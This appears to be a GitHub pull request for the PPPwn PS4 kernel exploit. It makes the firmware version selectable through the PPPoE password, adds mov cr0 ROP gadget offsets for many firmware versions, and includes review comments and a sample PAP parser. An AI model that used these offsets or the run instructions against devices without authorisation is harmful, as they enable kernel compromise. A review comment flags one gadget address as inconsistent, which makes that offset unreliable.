Use the PPPoE password to determine the system version #56

Status: Open. Wants to merge 7 commits into base: master.
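The mechanism this PR adds, reading the firmware version out of the PAP password the PS4 sends during PPPoE authentication, as an added example in Python. This is not code from the PPPwn project or from this PR: it parses a PAP Authenticate-Request (RFC 1334), resolves the password against the firmware versions that have offsets classes in this diff, and answers with an Ack or a Nak. The "`--fw` wins" precedence, the `strict` switch and the `1100` fallback are assumptions made here so the example covers both behaviours the README text describes (a Nak, which is what produces the "user ID or password is not correct" error on the console, and the silent fallback shown in the example run).

```python
import re
import struct
from typing import Optional, Tuple

# PAP packet codes (RFC 1334, section 2.2).
PAP_AUTH_REQUEST = 1
PAP_AUTH_ACK = 2
PAP_AUTH_NAK = 3

# Firmware versions that have an Offsets class in the diff on this page.
# DEFAULT_FIRMWARE mirrors the "Selected ... 1100" line of the example run;
# treating it as the fallback is an assumption of this example.
KNOWN_FIRMWARES = frozenset({
    "750", "755", "800", "803", "850", "852", "900", "903", "904",
    "950", "960", "1000", "1001", "1050", "1071", "1100",
})
DEFAULT_FIRMWARE = "1100"


def build_pap_request(ident: int, peer_id: str, password: str) -> bytes:
    """Encode an Authenticate-Request the way the console's PPP stack sends it."""
    pid, pw = peer_id.encode("ascii"), password.encode("ascii")
    body = bytes([len(pid)]) + pid + bytes([len(pw)]) + pw
    return struct.pack("!BBH", PAP_AUTH_REQUEST, ident, 4 + len(body)) + body


def parse_pap_request(payload: bytes) -> Tuple[int, str, str]:
    """Return (identifier, peer_id, password); raise ValueError on malformed input."""
    if len(payload) < 4:
        raise ValueError("PAP header truncated")
    code, ident, length = struct.unpack("!BBH", payload[:4])
    if code != PAP_AUTH_REQUEST:
        raise ValueError(f"expected Authenticate-Request, got code {code}")
    if length < 4 or length > len(payload):
        raise ValueError("PAP length field out of range")
    body = payload[4:length]
    # Layout: Peer-ID-Length, Peer-ID, Passwd-Length, Password. Every length
    # byte is checked against the bytes actually present before slicing.
    if len(body) < 2:
        raise ValueError("missing Peer-ID length")
    pid_len = body[0]
    if 1 + pid_len + 1 > len(body):
        raise ValueError("Peer-ID overruns packet")
    peer_id = body[1:1 + pid_len]
    pw_len = body[1 + pid_len]
    pw_start = 2 + pid_len
    if pw_start + pw_len > len(body):
        raise ValueError("Password overruns packet")
    password = body[pw_start:pw_start + pw_len]
    return ident, peer_id.decode("ascii", "replace"), password.decode("ascii", "replace")


def resolve_firmware(password: str, fw_arg: Optional[str] = None) -> Tuple[Optional[str], str]:
    """Pick the firmware whose offsets to use and report where it came from.

    Precedence (assumed here, the PR does not state one): an explicit --fw
    wins, then a password naming a known firmware ("900" or "9.00"),
    otherwise None so the caller decides whether to fall back or refuse.
    """
    if fw_arg:
        return fw_arg, "flag"
    cleaned = password.strip().replace(".", "")
    if re.fullmatch(r"\d{3,4}", cleaned) and cleaned in KNOWN_FIRMWARES:
        return cleaned, "password"
    return None, "unknown"


def build_pap_reply(ident: int, ack: bool, message: str = "") -> bytes:
    """Encode an Authenticate-Ack (2) or Authenticate-Nak (3) with a Message field."""
    msg = message.encode("ascii")
    body = bytes([len(msg)]) + msg
    code = PAP_AUTH_ACK if ack else PAP_AUTH_NAK
    return struct.pack("!BBH", code, ident, 4 + len(body)) + body


def handle_pap(payload: bytes, fw_arg: Optional[str] = None,
               strict: bool = False) -> Tuple[bytes, Optional[str]]:
    """Answer a PAP request and return (reply_bytes, selected_firmware).

    strict=True sends a Nak for an unknown version (the console then reports
    the "user ID or password is not correct" error); strict=False falls back
    to DEFAULT_FIRMWARE and Acks, matching the example run in the README.
    """
    ident, _peer, password = parse_pap_request(payload)
    fw, source = resolve_firmware(password, fw_arg)
    if fw is None:
        if strict:
            return build_pap_reply(ident, ack=False, message="unknown firmware"), None
        fw, source = DEFAULT_FIRMWARE, "default"
    return build_pap_reply(ident, ack=True, message=f"fw={fw} via {source}"), fw


if __name__ == "__main__":
    # Constructed sample: "me" / "9.00" typed into the PS4's PPPoE fields.
    req = build_pap_request(0x42, "me", "9.00")
    print(parse_pap_request(req))
    print(handle_pap(req))
    print(handle_pap(build_pap_request(1, "me", "1337"), strict=True))
```

The parser checks each embedded length against the bytes that are actually present before slicing, so a truncated or malformed request fails with `ValueError` instead of silently yielding an empty password that would then be treated as "unknown version".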
16 changes: 12 additions & 4 deletions README.md
@@ -55,7 +55,7 @@ For other firmwares, e.g. FW 9.00, pass `FW=900`.
DO NOT RUN the exploit just yet (don't press Enter yet) but prepare this command on your prompt (see `ifconfig` for the correct interface):

```sh
sudo python3 pppwn.py --interface=enp0s3 --fw=1100
sudo python3 pppwn.py --interface=enp0s3 [--fw=1100]
```

For other firmwares, e.g. FW 9.00, pass `--fw=900`.
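Review bot: making `--fw` optional (`[--fw=1100]`) leaves the README silent on what happens when it is omitted, and the unchanged context line right after, "For other firmwares, e.g. FW 9.00, pass `--fw=900`", still reads as if the flag were the only way to select a firmware, which is the opposite of what this PR is for. Add a sentence along the lines of "If `--fw` is omitted, the version is taken from the value you enter as the PPPoE password on the PS4; pass `--fw` to override it", and state which one wins when both are given.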
@@ -65,18 +65,20 @@ On your PS4:
- Go to `Settings` and then `Network`
- Select `Set Up Internet connection` and choose `Use a LAN Cable`
- Choose `Custom` setup and choose `PPPoE` for `IP Address Settings`
- Enter anything for `PPPoE User ID` and `PPPoE Password`
- Enter anything for `PPPoE User ID`
- Enter PS4/PS5 System Software version (e.g 900 for 9.00) for `PPPoE Password`
Owner commented:

Why PS5??

- Choose `Automatic` for `DNS Settings` and `MTU Settings`
- Choose `Do Not Use` for `Proxy Server`

- Now, simultaneously press the 'X' button on your controller on `Test Internet Connection` and 'Enter' on your keyboard (on the computer you have your Python script ready to run).

ALWAYS wait for you console to show the message "Cannot connect to network: (NW-31274-7)" before trying this PPOE injection again.
ALWAYS wait for your PS4 to show the message "Cannot connect to network. (NW-31274-7)" before trying this PPPoE injection again.

If the exploit fails or the PS4 crashes, you can skip the internet setup and simply click on `Test Internet Connection`. Kill the `pppwn.py` script and run it again on your computer, and then click on `Test Internet Connection` on your PS4: always simultaneously.

If your PS4 displays the error "The PPPoE user ID or password is not correct. (NW-31273-6)", then the PS4/PS5 System Software version specified as `PPPoE Password` is invalid.

If the exploit works, you should see an output similar to below, and you should see `Cannot connect to network.` followed by `PPPwned` printed on your PS4, or the other way around.
If the exploit works, you should see a console output similar to below, and a `Cannot connect to network.` notification on your PS4, followed by a `PPPwned` notification, or the other way around.

### Example run

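Review bot: the behaviour on an invalid version is described inconsistently within this PR. The new line "If your PS4 displays the error "The PPPoE user ID or password is not correct. (NW-31273-6)", then the PS4/PS5 System Software version specified as `PPPoE Password` is invalid" implies the script rejects the PAP request, whereas the example run added below shows an unknown password (`1337`) being mapped to `1100` and the exploit continuing. Document which of the two actually happens and under what condition (for instance whether `--fw` was passed). In the same hunk, "Enter PS4/PS5 System Software version (e.g 900 for 9.00)" should say PS4 only, as the owner asks above, "e.g" needs its period, and the accepted format should be spelled out (digits without the dot, and whether `9.00` is also accepted).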
@@ -97,6 +99,12 @@ If the exploit works, you should see an output similar to below, and you should
[*] Sending LCP configure ACK...
[*] Sending LCP configure request...
[*] Waiting for LCP configure ACK...
[*] Waiting for PAP authentication request...
[+] PAP username: me
[+] PAP password: 1337
[-] Unknown System Software version specified on PS4/PS5.
[+] Selected System Software version: 1100
[*] Sending PAP authentication ACK...
[*] Waiting for IPCP configure request...
[*] Sending IPCP configure NAK...
[*] Waiting for IPCP configure request...
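Review bot: the sample output shows the failure path rather than a successful run: `[+] PAP password: 1337` is followed by `[-] Unknown System Software version specified on PS4/PS5.` and then `[+] Selected System Software version: 1100`, and a reader cannot tell whether `1100` is a hard-coded default or the `--fw=1100` value from the command shown earlier in the README. Show a run with a valid password (for example `1100`) and describe the fallback separately in prose; the `[-]` prefix also reads as a fatal error even though the exploit proceeds, so a warning prefix or wording would be clearer. The message should also drop "PS5", consistent with the owner's comment on the setup steps.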
53 changes: 50 additions & 3 deletions offsets.py
@@ -17,14 +17,19 @@ class OffsetsFirmware_750_755:

MEMCPY = 0xffffffff8248f800

# Not available on FW >= 6.50
# 0xffffffff82200000 : mov cr0, rsi ; mov eax, 1 ; ret
MOV_CR0_RSI_MOV_EAX_1_RET = 0xffffffff82200000

# Not necessary on FW < 6.50
# 0xffffffffe19d9cf9 : mov cr0, rsi ; ud2 ; mov eax, 1 ; ret
MOV_CR0_RSI_UD2_MOV_EAX_1_RET = 0xffffffff825a2589

SECOND_GADGET_OFF = 0x3b

# 0xffffffff824095e7 : jmp qword ptr [rsi + 0x3b]
FIRST_GADGET = 0xffffffff824095e7

# 0xffffffff82c90516 : push rbp ; jmp qword ptr [rsi]
PUSH_RBP_JMP_QWORD_PTR_RSI = 0xffffffff82c90516

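Review bot: the gadget comment and the constant disagree: `# 0xffffffffe19d9cf9 : mov cr0, rsi ; ud2 ; mov eax, 1 ; ret` is followed by `MOV_CR0_RSI_UD2_MOV_EAX_1_RET = 0xffffffff825a2589`, and `0xffffffffe19d9cf9` is nowhere near the `0xffffffff82xxxxxx` text range every other offset in this file uses, so one of the two is wrong and should be re-checked against a gadget dump for 7.50-7.55. Separately, `MOV_CR0_RSI_MOV_EAX_1_RET = 0xffffffff82200000` sits under a comment saying the gadget is "Not available on FW >= 6.50" in a class that only covers 7.50-7.55: that value is the kernel base used as a placeholder, and if any code path ever selects it the chain jumps to the image base instead of a gadget. Drop the constant from the >= 6.50 classes (or set it to `None` so a misuse fails loudly) rather than carrying a fake address.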
@@ -57,7 +62,7 @@ class OffsetsFirmware_750_755:

# 0xffffffff82227fa7 : pop r8 ; pop rbp ; ret
POP_R8_POP_RBP_RET = 0xffffffff82227fa7

# 0xffffffff827dc32f : pop r12 ; ret
POP_R12_RET = 0xffffffff827dc32f

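Review bot: this hunk (`@@ -57,7 +62,7 @@`) shows no visible change in the rendered lines, so it is presumably a whitespace-only edit to the blank line between `POP_R8_POP_RBP_RET = 0xffffffff82227fa7` and the `pop r12 ; ret` comment. Unrelated whitespace cleanup is better kept out of a feature PR, or at least called out in the commit message so reviewers don't hunt for a content change.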
@@ -111,6 +116,11 @@ class OffsetsFirmware_800_803:

MEMCPY = 0xffffffff8245e1c0

# Not available on FW >= 6.50
# 0xffffffff82200000 : mov cr0, rsi ; mov eax, 1 ; ret
MOV_CR0_RSI_MOV_EAX_1_RET = 0xffffffff82200000

# Not necessary on FW < 6.50
# 0xffffffff82660609 : mov cr0, rsi ; ud2 ; mov eax, 1 ; ret
MOV_CR0_RSI_UD2_MOV_EAX_1_RET = 0xffffffff82660609

@@ -205,6 +215,11 @@ class OffsetsFirmware_850_852:

MEMCPY = 0xffffffff825a40f0

# Not available on FW >= 6.50
Owner commented:

Why do you have these comments

@Al-Azif (Contributor) commented on May 13, 2024:

Pre-6.50 you don't have the ud2 in that gadget, we can actually remove the MOV_CR0_RSI_MOV_EAX_1_RET gadget from FW >=6.50 and the MOV_CR0_RSI_UD2_MOV_EAX_1_RET from FW < 6.50. I just had them there when I was working on stuff so I could keep stuff straight, they're just the base @ ffffffff82200000 as a placeholder.

Or we can remove the conditional when the gadget is used and just use one of them for both (variable name won't match contents).

Owner commented:

Well please remove them

# 0xffffffff82200000 : mov cr0, rsi ; mov eax, 1 ; ret
MOV_CR0_RSI_MOV_EAX_1_RET = 0xffffffff82200000

# Not necessary on FW < 6.50
# 0xffffffff823ce849 : mov cr0, rsi ; ud2 ; mov eax, 1 ; ret
MOV_CR0_RSI_UD2_MOV_EAX_1_RET = 0xffffffff823ce849

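Review bot: the removal agreed in the thread above applies to every class in this file, not only `OffsetsFirmware_850_852`: the same `# Not available on FW >= 6.50` / `MOV_CR0_RSI_MOV_EAX_1_RET = 0xffffffff82200000` pair is added to the 7.50, 8.00, 8.50, 9.00, 9.03, 9.50, 10.00, 10.50 and 11.00 classes, all of which are >= 6.50. Since no class in this diff is below 6.50, only `MOV_CR0_RSI_UD2_MOV_EAX_1_RET` is ever needed and the conditional at the call site can go with it.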
@@ -299,6 +314,11 @@ class OffsetsFirmware_900:

MEMCPY = 0xffffffff824714b0

# Not available on FW >= 6.50
# 0xffffffff82200000 : mov cr0, rsi ; mov eax, 1 ; ret
MOV_CR0_RSI_MOV_EAX_1_RET = 0xffffffff82200000

# Not necessary on FW < 6.50
# 0xffffffff823fb949 : mov cr0, rsi ; ud2 ; mov eax, 1 ; ret
MOV_CR0_RSI_UD2_MOV_EAX_1_RET = 0xffffffff823fb949

@@ -392,6 +412,11 @@ class OffsetsFirmware_903_904:

MEMCPY = 0xffffffff82471130

# Not available on FW >= 6.50
# 0xffffffff82200000 : mov cr0, rsi ; mov eax, 1 ; ret
MOV_CR0_RSI_MOV_EAX_1_RET = 0xffffffff82200000

# Not necessary on FW < 6.50
# 0xffffffff823fb679 : mov cr0, rsi ; ud2 ; mov eax, 1 ; ret
MOV_CR0_RSI_UD2_MOV_EAX_1_RET = 0xffffffff823fb679

@@ -486,6 +511,12 @@ class OffsetsFirmware_950_960:

MEMCPY = 0xffffffff82401cc0

# Not available on FW >= 6.50
# 0xffffffff82200000 : mov cr0, rsi ; mov eax, 1 ; ret
MOV_CR0_RSI_MOV_EAX_1_RET = 0xffffffff82200000

# Not necessary on FW < 6.50
# 0xffffffff822bea79 : mov cr0, rsi ; ud2 ; mov eax, 1 ; ret
MOV_CR0_RSI_UD2_MOV_EAX_1_RET = 0xffffffff822bea79

SECOND_GADGET_OFF = 0x3b
@@ -579,6 +610,11 @@ class OffsetsFirmware_1000_1001:

MEMCPY = 0xffffffff82672d20

# Not available on FW >= 6.50
# 0xffffffff82200000 : mov cr0, rsi ; mov eax, 1 ; ret
MOV_CR0_RSI_MOV_EAX_1_RET = 0xffffffff82200000

# Not necessary on FW < 6.50
# 0xffffffff82376089 : mov cr0 rsi ; ud2 ; mov eax 1; ret
MOV_CR0_RSI_UD2_MOV_EAX_1_RET = 0xffffffff82376089

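Review bot: comment formatting: `# 0xffffffff82376089 : mov cr0 rsi ; ud2 ; mov eax 1; ret` drops the commas between operands and the space before the last `;` that every other gadget comment in this file uses (`mov cr0, rsi ; ud2 ; mov eax, 1 ; ret`); the `OffsetsFirmware_1050_1071` class below has the same `mov cr0 rsi ; ud2 ; mov eax 1; ret` line. Keep the ROPgadget-style spelling consistent so these comments can be grepped against a fresh gadget dump when offsets are re-verified.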
@@ -673,6 +709,12 @@ class OffsetsFirmware_1050_1071:

MEMCPY = 0xffffffff822d7370

# Not available on FW >= 6.50
# 0xffffffff82200000 : mov cr0, rsi ; mov eax, 1 ; ret
MOV_CR0_RSI_MOV_EAX_1_RET = 0xffffffff82200000

# Not necessary on FW < 6.50
# 0xffffffff82285f39 : mov cr0 rsi ; ud2 ; mov eax 1; ret
MOV_CR0_RSI_UD2_MOV_EAX_1_RET = 0xffffffff82285f39

SECOND_GADGET_OFF = 0x3b
@@ -766,6 +808,11 @@ class OffsetsFirmware_1100:

MEMCPY = 0xffffffff824dddf0

# Not available on FW >= 6.50
# 0xffffffff82200000 : mov cr0, rsi ; mov eax, 1 ; ret
MOV_CR0_RSI_MOV_EAX_1_RET = 0xffffffff82200000

# Not necessary on FW < 6.50
# 0xffffffff824f1299 : mov cr0, rsi ; ud2 ; mov eax, 1 ; ret
MOV_CR0_RSI_UD2_MOV_EAX_1_RET = 0xffffffff824f1299
